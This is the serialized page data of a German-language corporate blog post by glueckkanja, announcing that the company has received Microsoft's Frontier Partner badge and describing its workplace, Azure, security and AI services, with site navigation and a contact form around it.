[{"data":1,"prerenderedAt":21274},["ShallowReactive",2],{"global-header":3,"global-footer":759,"post-de--posts-2026-06-26-frontier-partner-1ef724e3808a69":797,"authors_data":967,"content-de-list-a91ba9a39090a":1313},{"lang":4,"home":5,"navigation":21,"meta":744,"contact":752},"de",{"folderSwitch":6,"name":9,"imgLight":10,"img":11,"languages":12},[7,8],"authors","blog","home","/logos/gk-Logo-sw.svg","/logos/gk-Logo-rgb.svg",{"de":13,"en":17,"es":19},{"title":14,"url":15,"alias":15,"alt":16},"Home","/de","glueckkanja Logo",{"title":14,"url":18,"alt":16},"/en",{"title":14,"url":20,"alt":16},"/es",[22,195,367,493,598,611],{"name":23,"languages":24,"children":32},"workplace",{"de":25,"en":28,"es":30},{"title":26,"description":27},"Workplace","Microsoft 365-Power für smarte, sichere und flexible Arbeitswelten, die modernste Technologien und Identity Lösungen verbinden.",{"title":26,"description":29},"Microsoft 365-powered for smart, secure, and flexible workspaces, seamlessly integrating cutting-edge technologies and identity services.",{"title":26,"description":31},"Potenciado por Microsoft 365 para espacios de trabajo inteligentes, seguros y flexibles, integrando a la perfección tecnologías de vanguardia y servicios de identidad (en ingles).",[33,81,137],{"name":34,"languages":35,"children":40},"portfolio",{"de":36,"en":38,"es":39},{"title":37},"Portfolio",{"title":37},{"title":37},[41,51,61,71],{"name":42,"languages":43},"managed-intune",{"de":44,"en":47,"es":49},{"title":45,"url":46},"Managed Intune","/de/entra-intune/managed-intune",{"title":45,"url":48},"/en/entra-intune/managed-intune",{"title":45,"url":50},"/es/entra-intune/managed-intune",{"name":52,"languages":53},"managed-entra",{"de":54,"en":57,"es":59},{"title":55,"url":56},"Managed 
Entra","/de/entra-intune/managed-entra",{"title":55,"url":58},"/en/entra-intune/managed-entra",{"title":55,"url":60},"/es/entra-intune/managed-entra",{"name":62,"languages":63},"managed-workplace",{"de":64,"en":67,"es":69},{"title":65,"url":66},"Managed Workplace","/de/workplace/managed-workplace",{"title":65,"url":68},"/en/workplace/managed-workplace",{"title":65,"url":70},"/es/workplace/managed-workplace",{"name":72,"languages":73},"consulting-services",{"de":74,"en":77,"es":79},{"title":75,"url":76},"Consulting Services","/de/workplace/consulting-services",{"title":75,"url":78},"/en/workplace/consulting-services",{"title":75,"url":80},"/es/workplace/consulting-services",{"name":82,"languages":83,"children":88},"microsoft-365-endpoint",{"de":84,"en":86,"es":87},{"title":85},"Microsoft 365 Endpoint",{"title":85},{"title":85},[89,99,109,119,127],{"name":90,"languages":91},"microsoft-entra-suite",{"de":92,"en":95,"es":97},{"title":93,"url":94},"Microsoft Entra Suite","/de/workplace/microsoft-entra-suite",{"title":93,"url":96},"/en/workplace/microsoft-entra-suite",{"title":93,"url":98},"/es/workplace/microsoft-entra-suite",{"name":100,"languages":101},"microsoft-intune",{"de":102,"en":105,"es":107},{"title":103,"url":104},"Microsoft Intune","/de/workplace/microsoft-intune",{"title":103,"url":106},"/en/workplace/microsoft-intune",{"title":103,"url":108},"/es/workplace/microsoft-intune",{"name":110,"languages":111},"microsoft-windows",{"de":112,"en":115,"es":117},{"title":113,"url":114},"Microsoft Windows","/de/workplace/microsoft-windows",{"title":113,"url":116},"/en/workplace/microsoft-windows",{"title":113,"url":118},"/es/workplace/microsoft-windows",{"name":120,"languages":121},"windows-365-cloud-pc",{"en":122,"es":125},{"title":123,"url":124},"Windows 365 Cloud 
PC","/en/workplace/windows365-cloud-pc",{"title":123,"url":126},"/es/workplace/windows365-cloud-pc",{"name":128,"languages":129},"cloud-workplace-foundation",{"de":130,"en":133,"es":135},{"title":131,"url":132},"Cloud Workplace Foundation","/de/workplace/cloud-workplace-foundation",{"title":131,"url":134},"/en/workplace/cloud-workplace-foundation",{"title":131,"url":136},"/es/workplace/cloud-workplace-foundation",{"name":138,"languages":139,"children":144},"microsoft-365-collaboration",{"de":140,"en":142,"es":143},{"title":141},"Microsoft 365 Collaboration",{"title":141},{"title":141},[145,155,165,175,185],{"name":146,"languages":147},"microsoft-copilot",{"de":148,"en":151,"es":153},{"title":149,"url":150},"Microsoft 365 Copilot","/de/workplace/microsoft-365-copilot",{"title":149,"url":152},"/en/workplace/microsoft-365-copilot",{"title":149,"url":154},"/es/workplace/microsoft-365-copilot",{"name":156,"languages":157},"microsoft-teams",{"de":158,"en":161,"es":163},{"title":159,"url":160},"Teams","/de/workplace/microsoft-teams",{"title":159,"url":162},"/en/workplace/microsoft-teams",{"title":159,"url":164},"/es/workplace/microsoft-teams",{"name":166,"languages":167},"sharepoint-powerplatform",{"de":168,"en":171,"es":173},{"title":169,"url":170},"SharePoint & Power Platform","/de/workplace/sharepoint-power-platform",{"title":169,"url":172},"/en/workplace/sharepoint-power-platform",{"title":169,"url":174},"/es/workplace/sharepoint-power-platform",{"name":176,"languages":177},"exchange-online",{"de":178,"en":181,"es":183},{"title":179,"url":180},"Exchange Online","/de/workplace/exchange-online",{"title":179,"url":182},"/en/workplace/exchange-online",{"title":179,"url":184},"/es/workplace/exchange-online",{"name":186,"languages":187},"information-protection-compliance",{"de":188,"en":191,"es":193},{"title":189,"url":190},"Information Protection & 
Compliance","/de/workplace/information-protection-compliance",{"title":189,"url":192},"/en/workplace/information-protection-compliance",{"title":189,"url":194},"/es/workplace/information-protection-compliance",{"name":196,"languages":197,"children":205},"azure",{"de":198,"en":201,"es":203},{"title":199,"description":200},"Azure","Mit Azure Wachstum beflügeln: Cloud-Kosten senken, Effizienz steigern und Innovationen durch IaaS und PaaS vorantreiben.",{"title":199,"description":202},"Fuel growth with Azure: Cut cloud costs, boost efficiency, and drive innovation through IaaS and PaaS.",{"title":199,"description":204},"Impulse el crecimiento con Azure: Reduzca los costes de la nube, aumente la eficiencia e impulse la innovación a través de IaaS y PaaS (en ingles).",[206,233,287],{"name":207,"languages":208,"children":212},"azure-portfolio",{"de":209,"en":210,"es":211},{"title":37},{"title":37},{"title":37},[213,223],{"name":214,"languages":215},"azure-managed-services",{"de":216,"en":219,"es":221},{"title":217,"url":218},"Azure Managed Services","/de/azure/azure-managed-services",{"title":217,"url":220},"/en/azure/azure-managed-services",{"title":217,"url":222},"/es/azure/azure-managed-services",{"name":224,"languages":225},"azure-consulting",{"de":226,"en":229,"es":231},{"title":227,"url":228},"Azure Consulting","/de/azure/azure-consulting",{"title":227,"url":230},"/en/azure/azure-consulting",{"title":227,"url":232},"/es/azure/azure-consulting",{"name":234,"languages":235,"children":241},"azure-scenarios",{"de":236,"en":238,"es":240},{"title":237},"Szenarios",{"title":239},"Scenarios",{"title":239},[242,253,264,275],{"name":243,"languages":244},"plan-your-cloud",{"de":245,"en":248,"es":251},{"title":246,"url":247},"Planen Sie Ihre Cloud","/de/azure/plan-your-cloud",{"title":249,"url":250},"Plan your 
Cloud","/en/azure/plan-your-cloud",{"title":249,"url":252},"/es/azure/plan-your-cloud",{"name":254,"languages":255},"migrate-to-the-cloud",{"de":256,"en":259,"es":262},{"title":257,"url":258},"Migriere deine Cloud","/de/azure/migrate-to-the-cloud",{"title":260,"url":261},"Migrate to the cloud","/en/azure/migrate-to-the-cloud",{"title":260,"url":263},"/es/azure/migrate-to-the-cloud",{"name":265,"languages":266},"innovate-your-business",{"de":267,"en":270,"es":273},{"title":268,"url":269},"Erneuere dein Business","/de/azure/innovate-your-business",{"title":271,"url":272},"Innovate your business","/en/azure/innovate-your-business",{"title":271,"url":274},"/es/azure/innovate-your-business",{"name":276,"languages":277},"vmware-exit",{"de":278,"en":281,"es":284},{"title":279,"url":280},"Überdenke deine VMware-Strategie","/de/azure/vmware-exit",{"title":282,"url":283},"Rethink your VMware strategy","/en/azure/vmware-exit",{"title":285,"url":286},"Replantea tu estrategia de VMware","/es/azure/vmware-exit",{"name":288,"languages":289,"children":294},"azure-practices",{"de":290,"en":292,"es":293},{"title":291},"Practices",{"title":291},{"title":291},[295,305,313,318,328,337,347,357],{"name":296,"languages":297},"azure-foundation",{"de":298,"en":301,"es":303},{"title":299,"url":300},"Azure Foundation","/de/azure/azure-foundation",{"title":299,"url":302},"/en/azure/azure-foundation",{"title":299,"url":304},"/es/azure/azure-foundation",{"name":306,"languages":307},"avd-foundation",{"en":308,"es":311},{"title":309,"url":310},"AVD Foundation","/en/azure/avd-foundation",{"title":309,"url":312},"/es/azure/avd-foundation",{"name":128,"languages":314},{"de":315,"en":316,"es":317},{"title":131,"url":132},{"title":131,"url":134},{"title":131,"url":136},{"name":319,"languages":320},"azure-data-foundation",{"de":321,"en":324,"es":326},{"title":322,"url":323},"Azure Data 
Foundation","/de/azure/azure-data-foundation",{"title":322,"url":325},"/en/azure/azure-data-foundation",{"title":322,"url":327},"/es/azure/azure-data-foundation",{"name":296,"languages":329},{"de":330,"en":333,"es":335},{"title":331,"url":332},"Azure Container Foundation","/de/azure/azure-container-foundation",{"title":331,"url":334},"/en/azure/azure-container-foundation",{"title":331,"url":336},"/es/azure/azure-container-foundation",{"name":338,"languages":339},"dark-tenant",{"de":340,"en":343,"es":345},{"title":341,"url":342},"Dark Tenant","/de/azure/dark-tenant",{"title":341,"url":344},"/en/azure/dark-tenant",{"title":341,"url":346},"/es/azure/dark-tenant",{"name":348,"languages":349},"azure-cloud-adoption-framework",{"de":350,"en":353,"es":355},{"title":351,"url":352},"Cloud Adoption Framework","/de/azure/cloud-adoption-framework",{"title":351,"url":354},"/en/azure/cloud-adoption-framework",{"title":351,"url":356},"/es/azure/cloud-adoption-framework",{"name":358,"languages":359},"azure-cloud-competence-center",{"de":360,"en":363,"es":365},{"title":361,"url":362},"Cloud Competence Center","/de/azure/cloud-competence-center",{"title":361,"url":364},"/en/azure/cloud-competence-center",{"title":361,"url":366},"/es/azure/cloud-competence-center",{"name":368,"languages":369,"children":386},"security",{"de":370,"en":378,"es":382},{"title":371,"description":372,"emergency":373},"Security","Wachsamkeit in der Cloud mit einem preisgekrönten 24/7 Managed Service, Incident Response und modernstem Schutz für Ihre Infrastruktur.",{"text":374,"href":375,"skin":376,"icon":377},"Under Attack?","/de/security/are-you-under-attack","primary","emergency",{"title":371,"description":379,"emergency":380},"Vigilance in the cloud with an award-winning 24/7 managed service, incident response and state-of-the-art protection for your infrastructure.",{"text":374,"href":381,"skin":376,"icon":377},"/en/security/are-you-under-attack",{"title":371,"description":383,"emergency":384},"Vigilancia 
en la nube con un galardonado servicio gestionado 24/7, respuesta ante incidentes y protección de vanguardia para su infraestructura (en ingles).",{"text":374,"href":385,"skin":376,"icon":377},"/es/security/are-you-under-attack",[387,415,448],{"name":388,"children":389},"security-security-consulting",[390,400,405],{"name":391,"languages":392},"managed-red-tenant",{"de":393,"en":396,"es":398},{"title":394,"url":395},"Managed Red Tenant","/de/security/managed-red-tenant",{"title":394,"url":397},"/en/security/managed-red-tenant",{"title":394,"url":399},"/es/security/managed-red-tenant",{"name":338,"languages":401},{"de":402,"en":403,"es":404},{"title":341,"url":342},{"title":341,"url":344},{"title":341,"url":346},{"name":406,"languages":407},"security-consulting",{"de":408,"en":411,"es":413},{"title":409,"url":410},"Security Consulting","/de/security/security-consulting",{"title":409,"url":412},"/en/security/security-consulting",{"title":409,"url":414},"/es/security/security-consulting",{"name":416,"children":417},"security-cloud-security-operations-center",[418,428,438],{"name":419,"languages":420},"cloud-security-operations-center",{"de":421,"en":424,"es":426},{"title":422,"url":423},"Cloud Security Operations Center","/de/security/cloud-security-operations-center",{"title":422,"url":425},"/en/security/cloud-security-operations-center",{"title":422,"url":427},"/es/security/cloud-security-operations-center",{"name":429,"languages":430},"global-secure-access",{"de":431,"en":434,"es":436},{"title":432,"url":433},"Global Secure 
Access","/de/security/global-secure-access",{"title":432,"url":435},"/en/security/global-secure-access",{"title":432,"url":437},"/es/security/global-secure-access",{"name":439,"languages":440},"my-work-id",{"de":441,"en":444,"es":446},{"title":442,"url":443},"MyWorkID","/de/security/my-work-id",{"title":442,"url":445},"/en/security/my-work-id",{"title":442,"url":447},"/es/security/my-work-id",{"name":449,"children":450},"security-preventive-services",[451,461,471,481],{"name":452,"languages":453},"preventive-services",{"de":454,"en":457,"es":459},{"title":455,"url":456},"Preventive Services","/de/security/preventive-services",{"title":455,"url":458},"/en/security/preventive-services",{"title":455,"url":460},"/es/security/preventive-services",{"name":462,"languages":463},"data-security-services",{"de":464,"en":467,"es":469},{"title":465,"url":466},"Data Security Service","/de/security/data-security-service",{"title":465,"url":468},"/en/security/data-security-service",{"title":465,"url":470},"/es/security/data-security-service",{"name":472,"languages":473},"security-copilot-agents",{"de":474,"en":477,"es":479},{"title":475,"url":476},"Security Copilot Agents","/de/security/security-copilot-agents",{"title":475,"url":478},"/en/security/security-copilot-agents",{"title":475,"url":480},"/es/security/security-copilot-agents",{"name":482,"languages":483},"nis2",{"de":484,"en":487,"es":490},{"title":485,"url":486},"NIS2 technisch umsetzen","/de/security/red-dark-tenant-nis2",{"title":488,"url":489},"Implementing NIS2","/en/security/red-dark-tenant-nis2",{"title":491,"url":492},"Implementación técnica de NIS2","/es/security/red-dark-tenant-nis2",{"name":494,"languages":495,"children":505},"products",{"de":496,"en":499,"es":502},{"title":497,"description":498},"Produkte","Innovative Companion-Produkte für eine vollständig sichere, 100% cloud-native Microsoft-Umgebung, die Zusammenarbeit, Netzwerkauthentifizierung und Softwareverwaltung 
verbessern.",{"title":500,"description":501},"Products","Innovative companion products for a completely secure, 100% cloud-native Microsoft environment that enhance collaboration, network authentication and software management.",{"title":503,"description":504},"Productos","Innovadores productos complementarios para un entorno Microsoft completamente seguro y 100% nativo de la nube que mejoran la colaboración, la autenticación en red y la gestión del software (en ingles).",[506,559],{"name":507,"products":508,"children":509},"lorem ipsum 1",true,[510,523,535,547],{"name":511,"img":512,"target":513,"languages":514},"realmjoin","products/realmjoin/realmjoin-nav-logo.svg","_blank",{"de":515,"en":519,"es":521},{"title":516,"subtitle":517,"url":518},"RealmJoin","Cloudbasierte Softwareverteilung","https://www.realmjoin.com",{"title":516,"subtitle":520,"url":518},"Cloudbased Software distribution",{"title":516,"subtitle":522,"url":518},"Distribución de software en la nube",{"name":524,"img":525,"target":513,"languages":526},"scepman","products/scepman/scepman-nav-logo.svg",{"de":527,"en":531,"es":533},{"title":528,"subtitle":529,"url":530},"SCEPman","Zertifikatsverteilung aus der Cloud","https://www.scepman.com",{"title":528,"subtitle":532,"url":530},"Certificate distribution from the cloud",{"title":528,"subtitle":534,"url":530},"Distribución de certificados desde la nube",{"name":536,"img":537,"target":513,"languages":538},"konnekt","products/konnekt/konnekt-nav-logo.svg",{"de":539,"en":543,"es":545},{"title":540,"subtitle":541,"url":542},"KONNEKT","Arbeiten Sie lokal mit Ihren Office 365-Daten","https://www.konnekt.io",{"title":540,"subtitle":544,"url":542},"Work with your local office 365 data",{"title":540,"subtitle":546,"url":542},"Trabaje con sus datos locales de office 
365",{"name":548,"img":549,"target":513,"languages":550},"realmigrator","products/realmigrator/realmigrator-nav-logo.svg",{"de":551,"en":555,"es":557},{"title":552,"subtitle":553,"url":554},"RealMigrator","Migrieren Sie alle Ihre Datenressourcen","https://www.realmigrator.com",{"title":552,"subtitle":556,"url":554},"Migrate your data from one server to another",{"title":552,"subtitle":558,"url":554},"Migre sus datos de un servidor a otro",{"name":560,"products":508,"children":561},"lorem ipsum 2",[562,574,586],{"name":563,"img":564,"target":513,"languages":565},"terraprovider","products/terraprovider/terraprovider-nav-logo.svg",{"de":566,"en":570,"es":572},{"title":567,"subtitle":568,"url":569},"TerraProvider","Terraform Provider für Microsoft 365","https://www.terraprovider.com",{"title":567,"subtitle":571,"url":569},"Terraform Provider for Microsoft 365",{"title":567,"subtitle":573,"url":569},"Terraform Provider para Microsoft 365",{"name":575,"img":576,"target":513,"languages":577},"radiusaas","products/radius/radius-nav-logo.svg",{"de":578,"en":582,"es":584},{"title":579,"subtitle":580,"url":581},"RADIUSaaS","Authentifizierung für Ihr Netzwerk","https://www.radius-as-a-service.com",{"title":579,"subtitle":583,"url":581},"Authentication for your network",{"title":579,"subtitle":585,"url":581},"Autenticación para su red",{"name":587,"img":588,"target":513,"languages":589},"unifiedcontacts","products/unified-contacts/unifiedcontact-nav-logo.svg",{"de":590,"en":594,"es":596},{"title":591,"subtitle":592,"url":593},"Unified Contacts","Finden Sie alle Ihre Kontakte in Microsoft Teams","https://www.unified-contacts.com",{"title":591,"subtitle":595,"url":593},"Find contacts in Microsoft Teams",{"title":591,"subtitle":597,"url":593},"Buscar contactos en Microsoft Teams",{"name":599,"languages":600},"casestudies",{"de":601,"en":605,"es":608},{"title":602,"description":603,"url":604},"Case Studies","Pionier in der Cloud: Ihr Top-Microsoft-Partner für umfassende 
Cloud-Lösungen mit einem Blueprint-basierten Ansatz und Infrastructure-as-Code-Expertise.","/de/casestudies",{"title":602,"description":606,"url":607},"Pioneer in the Cloud: Your top Microsoft partner for comprehensive cloud solutions with a Blueprint-based approach and Infrastructure-as-Code expertise.","/en/casestudies",{"title":602,"description":609,"url":610},"Pionero en la Cloud: Su principal socio de Microsoft para soluciones integrales en la nube con un enfoque basado en Blueprint y experiencia en infraestructura como código (en ingles).","/es/casestudies",{"name":612,"languages":613,"children":620},"company",{"de":614,"en":616,"es":618},{"title":615,"description":603},"Unternehmen",{"title":617,"description":606},"Company",{"title":619,"description":609},"Empresa",[621,677,714],{"name":622,"languages":623,"children":630},"company-about-us",{"de":624,"en":626,"es":628},{"title":625},"Über Uns",{"title":627},"About us",{"title":629},"Acerca de nosotros",[631,642,654,666],{"name":632,"languages":633},"company-facts-figures",{"de":634,"en":637,"es":639},{"title":635,"url":636},"Facts & Figures","/de/company/facts-and-figures",{"title":635,"url":638},"/en/company/facts-and-figures",{"title":640,"url":641},"Datos y cifras","/es/company/facts-and-figures",{"name":643,"languages":644},"company-contact",{"de":645,"en":648,"es":651},{"title":646,"url":647},"Kontakt & Standorte","/de/company/contact-and-locations",{"title":649,"url":650},"Contact & Locations","/en/company/contact-and-locations",{"title":652,"url":653},"Contacto y ubicaciones","/es/company/contact-and-locations",{"name":655,"languages":656},"switzerland",{"de":657,"en":660,"es":663},{"title":658,"url":659},"glueckkanja Schweiz","/de/company/switzerland",{"title":661,"url":662}," glueckkanja Switzerland","/en/company/switzerland",{"title":664,"url":665},"glueckkanja Suiza","/es/company/switzerland",{"name":667,"languages":668},"austria",{"de":669,"en":672,"es":675},{"title":670,"url":671},"glueckkanja 
Österreich","/de/company/austria",{"title":673,"url":674},"glueckkanja Austria","/en/company/austria",{"title":673,"url":676},"/es/company/austria",{"name":678,"languages":679,"children":686},"company-career",{"de":680,"en":682,"es":684},{"title":681},"Karriere",{"title":683},"Career",{"title":685},"Carreras",[687,699,705],{"name":688,"languages":689},"company-career-overview",{"de":690,"en":693,"es":696},{"title":691,"url":692},"Karriere Übersicht","/de/career",{"title":694,"url":695},"Career overview","/en/career",{"title":697,"url":698},"Carrera general","/es/career",{"name":700,"languages":701},"company-young-professionals",{"de":702},{"title":703,"url":704},"Young Professionals","/de/young-professionals",{"name":706,"languages":707},"company-jobs",{"de":708,"en":711},{"title":709,"url":710},"Stellenanzeigen","/de/job-offers",{"title":712,"url":713},"Job offers","/en/job-offers",{"name":715,"languages":716,"children":723},"company-latest",{"de":717,"en":719,"es":721},{"title":718},"Aktuelles",{"title":720},"Latest",{"title":722},"Últimas novedades",[724,734],{"name":725,"languages":726},"company-blog",{"de":727,"en":730,"es":732},{"title":728,"url":729},"Blog","/de/blog",{"title":728,"url":731},"/en/blog",{"title":728,"url":733},"/es/blog",{"name":725,"languages":735},{"de":736,"en":739,"es":741},{"title":737,"url":738},"Events","/de/events",{"title":737,"url":740},"/en/events",{"title":742,"url":743},"Eventos","/es/events",[745],{"name":746,"languages":747},"career-meta",{"de":748,"en":750,"es":751},{"title":681,"url":692,"active":749},false,{"title":683,"url":695,"active":749},{"title":683,"url":698,"active":749},{"languages":753},{"de":754,"en":756,"es":758},{"title":755,"url":647,"active":749},"Kontakt",{"title":757,"url":650,"active":749},"Contact",{"title":757,"url":653,"active":749},{"data":760},{"bgColor":761,"number":762,"mail":763,"brandLogos":764,"logos":765,"links":769,"linksEn":779,"linksEs":788},"var(--color-gk-mid-blue)","+49 69 
4005520","info@glueckkanja.com",null,[766],{"img":10,"alt":16,"url":767,"class":768},"index.html","max-w-19rem",[770,773,776],{"title":771,"url":772},"Datenschutz","/de/privacy",{"title":774,"url":775},"Impressum","/de/imprint",{"title":777,"url":778},"No Cookies","/de/cookies",[780,783,786],{"title":781,"url":782},"Privacy","/en/privacy",{"title":784,"url":785},"Imprint","/en/imprint",{"title":777,"url":787},"/en/cookies",[789,791,794],{"title":790,"url":782},"Privacidad",{"title":792,"url":793},"Imprimir","/es/imprint",{"title":795,"url":796},"Sin Cookies","/es/cookies",{"id":798,"title":799,"author":800,"body":802,"cta":764,"description":808,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":871,"moment":874,"navigation":508,"path":959,"seo":960,"stem":961,"tags":962,"webcast":749,"__hash__":966},"content_de/posts/2026-06-26-frontier-partner.md","Microsoft Frontier Partner: wir gehören dazu",[801],"Carolin Kanja",{"type":803,"value":804,"toc":862},"minimal",[805,809,814,817,820,824,826,829,850,853,857,859],[806,807,808],"p",{},"Im Microsoft-Partner-Ökosystem gibt es eine ganze Reihe von Anerkennungen, und doch hebt sich das Frontier Partner Badge in seiner Anlage von den anderen Auszeichnungen ab. Es lässt sich nicht beantragen, sondern wird auf Initiative von Microsoft an einen exklusiven Kreis von Partnern vergeben, die in mehreren Disziplinen parallel überzeugen müssen, statt in einer einzelnen zu glänzen. 
Microsoft prüft dabei nachgewiesene Kompetenz in Cloud & AI Platforms, in AI Business Solutions und in Security gleichermaßen und adressiert damit Unternehmen, die KI nicht als Aufsatz auf bestehende IT verstehen, sondern als Ergebnis einer durchgängigen Architektur, die von der Identität über den Endpoint bis in den produktiven KI-Betrieb trägt.",[810,811,813],"h2",{"id":812},"was-microsoft-mit-dem-badge-prüft","Was Microsoft mit dem Badge prüft",[806,815,816],{},"{: .h3-font-size}",[806,818,819],{},"Microsoft prüft beim Frontier Partner Badge nicht eine Disziplin allein, sondern eine Kette, in der sich Cloud-Plattform, KI-Anwendung und Security gegenseitig bedingen. Die Cloud-Plattform und die KI-Infrastruktur müssen tragfähig genug sein, damit produktive KI-Anwendungen darauf laufen können, und diese Anwendungen wiederum müssen den Übergang aus dem Pilot in den Regelbetrieb tatsächlich vollziehen, nicht nur in der Demo überzeugen. Die Absicherung dieser Umgebung gegen reale Angriffe steht in beiden Disziplinen quer im Raum und entscheidet darüber, ob aus einem KI-Vorhaben am Ende produktive Wertschöpfung wird oder ein Sicherheitsrisiko, das in regulierten Branchen nicht tragbar ist. Daten- und Identitäts-Architektur sind in diesem Modell keine separaten Themen, sondern Teil jeder dieser Disziplinen, und genau an dieser Stelle scheitern die meisten KI-Vorhaben in Unternehmen, wenn die Foundation darunter nicht trägt.",[810,821,823],{"id":822},"worauf-das-badge-bei-uns-aufsetzt","Worauf das Badge bei uns aufsetzt",[806,825,816],{},[806,827,828],{},"Wir bauen seit Jahren in der Reihenfolge, in der Microsoft prüft: zunächst die Foundation, auf der alles ruht, dann die Workloads, die darauf laufen, und schließlich die Intelligenz, die in diese Workloads einzieht. 
Jeder Bereich, den Microsoft beim Frontier Partner Badge betrachtet, mappt auf einen unserer Services, der in produktiven Kundenumgebungen läuft und damit nicht im Konzeptpapier, sondern im Tagesbetrieb verifiziert ist.",[806,830,831,832,835,836,838,839,835,841,843,844,846,847,849],{},"Im Arbeitsplatz halten die ",[833,834,131],"a",{"href":132}," und ",[833,837,45],{"href":46}," Windows 365, Azure Virtual Desktop und klassische Endgeräte unter einer gemeinsamen Logik zusammen, und darunter sorgt eine versionskontrollierte Intune-Umgebung dafür, dass jede Richtlinie als Code gepflegt wird und Drift-Erkennung anschlägt, bevor eine Konfigurationsabweichung ausnutzbar wird. Auf der Cloud-Plattform liefern die ",[833,840,299],{"href":300},[833,842,322],{"href":323}," eine Landing Zone und eine Lakehouse-Architektur, die KI-Anwendungen mit konsistenten Daten versorgen und die Trennung von Plattform- und Anwendungsebene konsequent durchziehen. Auf der Security-Ebene sorgen der ",[833,845,394],{"href":395}," und unser Cloud Security Operations Center für einen vollständig getrennten administrativen Kontext, für Privileged Access Workstations und für einen rund um die Uhr überwachten SOC-Betrieb, der in Defender und Sentinel Angriffe nicht erst dann sieht, wenn sie schon Wirkung entfaltet haben. 
Und in der KI-Anwendung rekonstruieren die ",[833,848,475],{"href":476}," Incidents in Defender XDR, reichern sie mit Bedrohungsdaten an und übernehmen damit Triage-Arbeit, die heute Stunden im SOC bindet.",[806,851,852],{},"Genau diese durchgängige Kette, vom Arbeitsplatz bis in die produktive KI-Anwendung, ist die Substanz, die Microsoft mit dem Frontier Partner Badge bestätigt.",[810,854,856],{"id":855},"was-das-badge-für-kundenprojekte-bedeutet","Was das Badge für Kundenprojekte bedeutet",[806,858,816],{},[806,860,861],{},"Für ein Unternehmen, das überlegt, mit welchem Partner es seine ersten produktiven KI-Projekte aufsetzt, ist das Frontier Partner Badge eine Abkürzung im Auswahlprozess, weil das Siegel von Microsoft direkt vergeben wird und damit signalisiert, dass diese Gruppe KI-Projekte in regulierten, security-sensiblen Umgebungen zu Ende bringen kann. In der Praxis verschiebt das die Gespräche zwischen Partner, Kunde und Microsoft auf eine andere Ebene, weil Frontier Partner näher an Microsofts Roadmap sitzen und für Pilotprogramme und frühe Releases direkt adressiert werden, während Microsoft-Account-Teams sie für Co-Engagements heranziehen, wenn ein Kunde bei einem KI-Vorhaben technische Tragfähigkeit braucht. Zugleich stehen die ausgezeichneten Partner unter dauerhaftem Nachweisdruck, denn wer in diesem Jahr qualifiziert ist, muss es im nächsten Jahr wieder sein, und der Anforderungskatalog selbst verschiebt sich von Jahr zu Jahr. 
Bestandsschutz gibt es nicht.",{"title":863,"searchDepth":864,"depth":864,"links":865},"",2,[866,867,868],{"id":812,"depth":864,"text":813},{"id":822,"depth":864,"text":823},{"id":855,"depth":864,"text":856},"md","post",{"lang":4,"seoTitle":872,"titleClass":873,"date":874,"categories":875,"blogtitlepic":877,"socialimg":878,"customExcerpt":879,"keywords":880,"contactInContent":881,"hreflang":951,"published":508,"scripts":958},"Microsoft Frontier Partner Badge: glueckkanja qualifiziert","h2-font-size","2026-06-26",[876],"Corporate","head-frontier-partner-badge.jpg","/blog/heads/head-frontier-partner-badge.jpg","Seit kurzem gibt es im Microsoft AI Cloud Partner Program eine neue Spitzenauszeichnung, das Frontier Partner Badge. Microsoft verleiht es ausschließlich an einen exklusiven Kreis von Partnern weltweit, die KI-Projekte auf dem gesamten Microsoft-Stack tragfähig liefern, vom Arbeitsplatz über die Cloud-Plattform und Security bis in die KI-Anwendung selbst, und diesen Anspruch in der Praxis nachgewiesen haben. Im DACH-Raum zählt diese Gruppe nur eine Handvoll Unternehmen, und wir sind eines davon.","Frontier Partner, Microsoft Frontier Partner Badge, Microsoft AI Cloud Partner Program, Solutions Partner Designation, Specialization Copilot, Specialization AI Apps, Specialization Data Security, Microsoft Partner Deutschland, Microsoft AI Solutions Partner, glueckkanja Microsoft Partner, Copilot Solutions Partner, Modern Work, Security Solutions Partner, Microsoft Partner Center",{"quote":508,"infos":882},{"bgColor":883,"color":884,"boxBgColor":761,"boxColor":884,"headline":885,"subline":886,"level":810,"textStyling":887,"flush":888,"person":889,"form":904},"var(--color-gk-dark-blue)","var(--color-gk-white)","Jetzt Kontakt aufnehmen","Ihr plant KI-Vorhaben im Microsoft-Stack und wollt wissen, was das Frontier-Badge in der Praxis für eure Umgebung bedeutet? 
Sprecht uns an, wir gehen mit euch durch, wo ihr heute steht und was sinnvoll als Nächstes kommt.","text-light","justify-content-end",{"image":890,"cloudinary":508,"alt":891,"name":892,"quotee":892,"quoteeTitle":893,"quote":894,"detailsHeader":895,"details":896},"/people/at-andreas-hoetzinger.png","Andreas Hötzinger, Head of Partner Alliances","Andreas Hötzinger","Head of Partner Alliances","Microsoft hat die Latte mit dem Frontier Partner Badge bewusst hoch gelegt. Wer durchgeht, hat in mehreren Disziplinen geliefert, nicht in einer. Für Kunden ist das im Auswahlprozess die kürzeste Antwort auf die Frage, wer KI im Microsoft-Stack tragfähig macht.","Wir freuen uns darauf,\u003Cbr />von euch zu hören!",[897,901],{"text":762,"href":898,"details":899,"icon":900},"tel:+49 69 4005520","Jetzt anrufen","site/phone",{"text":763,"href":902,"icon":903},"mailto:info@glueckkanja.com","site/mail",{"ctaText":905,"cta":906,"method":870,"action":908,"fields":909},"Absenden",{"skin":907},"primary on-surface","/send",[910,914,919,922,926,931,936,938,941,944,947,949],{"type":911,"id":912,"value":913},"hidden","_next","successful",{"label":915,"type":916,"id":917,"required":508,"requiredMsg":918},"Name*","text","name","Bitte gib deinen Namen ein.",{"label":920,"type":916,"id":612,"required":508,"requiredMsg":921},"Unternehmen*","Bitte gib dein Unternehmen ein.",{"label":923,"type":924,"id":924,"required":508,"requiredMsg":925},"E-Mail-Adresse*","email","Bitte gib deine E-Mail-Adresse ein.",{"label":927,"type":928,"id":929,"required":749,"requiredMsg":930},"Deine Nachricht an uns","textarea","message","Bitte gib eine Nachricht ein.",{"label":932,"type":933,"id":934,"required":508,"requiredMsg":935},"Deine Daten werden gespeichert und zur Bearbeitung deiner Anfrage verwendet. 
